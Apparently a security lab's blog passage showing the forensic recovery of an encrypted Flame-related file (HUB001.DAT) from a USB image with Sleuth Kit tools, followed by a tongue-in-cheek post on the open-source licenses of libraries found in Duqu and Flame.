1738 1739 1740 1741 1742 1743 1744 1745
1746 1747 1748 1749 1750 1751 1752 1753
1754 1755 1756 1757 1758 1759 1760 1761
1762 1763 1764 1765 1766 1767 1768 1769
1770 1771 1772 1773 1774 1775 1776 1777
1778 1779 1780 1781 1782 1783 1784 1785
1786 1787 1788 1789 1790 1791 1792 1793
1794 1795 1796 1797 1798 1799 1800 1801
1802 1803 1804 1805 1806 1807 1808 1809
1810 1811 1812 1813 1814 1815 1816 1817
1818 1819 1820 1821 1822 1823 1824 1825
1826 1827 1828 1829 1830 1831 1832 1833
1834 1835 1836 1837 1838 1839 1840 1841
1842 1843 1844 1845 1846 1847 1848 1849
1850 1851 1852 1853 1854 1855 1856 1857
1858 1859 1860 1861 1862 1863 1864 1865
1866 1867 1868 1869 1870 1871 1872 1873
1874 1875 1876 1877 1878 1879 1880 1881
1882 1883 1884 1885 1886 1887 1888 1889
1890 1891 1892 1893 1894 1895 1896 1897
1898 1899 1900 1901 1902 1903 1904 1905
1906 1907 1908 1909 1910 1911 1912 1913
1914 1915 1916 1917 1918 1919 1920 1921
1922 1923 1924 1925 1926 1927 1928 1929
1930 1931 1932 1933 1934 1935 1936 1937
1938 1939 1940 1941 1942 1943 1944 1945
1946 1947 1948 1949 1950 1951 1952 1953
1954 1955 1956 1957 1958 1959 1960 1961
1962 1963 1964 1965 1966 1967 1968 1969
1970 1971 1972 1973 1974 1975 1976 1977
1978 1979 1980 1981 1982 1983 1984 1985
1986 1987 1988 1989 1990 1991 1992 1993
1994 1995 1996 1997 1998 1999 2000 2001
2002 2003 2004 2005 2006 2007 2008 2009
2010 2011 2012 2013 2014 2015 2016 2017

Remember the size from the dir command?

HUB001.DAT? :

00d2020: 4855 4230 3031 2020 4441 5426 0000 0000 HUB001 DAT&....
00d2030: 0000 cc40 0000 b9b1 cc40 0300 00a0 0200 ...@.....@......

Yes. But even ifind could cheat us:

ifind -a -n "HUB001.DAT" ./usb1
2


But fsstat shows the 336 sectors (of standard 512 bytes) we are looking for:

FAT CONTENTS (in sectors)

1680-1681 (2) -> EOF
1682-2017 (336) -> EOF


So Let’s do:

icat-sleuthkit ./usb1 4 >hub001.dat

Great
-rw-r--r-- 1 root root 172032 Jun 12 22:53 hub001.dat

xxd hub001.dat |less
0000000: 217a 30e6 280c b557 da53 ce11 28b5 60ea !z0.(..W.S..(.`.
0000010: 07ea 8282 ea2e b5b5 eaea eabb eaea eaea ................

Ok, It’s encrypted. Get the skywiper techrep for reference! It’s like Figure 24 on Encryption E1.

After decryption:

0000000000: 53 51 4C 69 74 65 20 66 │ 6F 72 6D 61 74 20 33 00 SQLite format 3
0000000010: 10 00 01 01 00 40 20 20 │ 00 00 00 38 00 00 00 00 ► ☺☺ @ 8
0000000020: 00 00 00 00 00 00 00 00 │ 00 00 00 0D 00 00 00 03 ♪ ♥
0000000030: 00 00 00 00 00 00 00 0E │ 00 00 00 01 00 00 00 00 ♫ ☺
0000000040: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00


Seems ok, confirmed. Thanks again for Bitdefender for the great job.

Dear All,
As You know, the recent nation-sponsored attacks used a bunch of libraries. However, nobody investigated yet the license terms. Here is a short list, based on the feedbacks we might update this article

Duqu:

modified LZO for .zdata: LZO and the LZO algorithms and implementations are distributed under the terms of the GNU General Public License (GPL) .

Flame:

putty -MIT license
libbz2 – BSD-style license
zlib – very permissive license http://www.gzip.org/zlib/zlib_license.html
SQLite – public domain
Lua – MIT license

As we are after a long-long day of serious problems, let’s go for some nice and easy point.

So our questions is: Please, Dear Authors of Duqu (whoever they are), hand over the source code of Duqu (or Beacon/NYT), as it contains GPL code.

The source code can be sent to duqusubmit@crysys.hu.
Discussion on the topic is highly welcome.

Thank you for your attention.
b.

Disclaimer: This post is for fun, don’t take it too seriously, but the questions are still valid. This post is a personal post of one of the Lab members and does not reflect the view of any organization.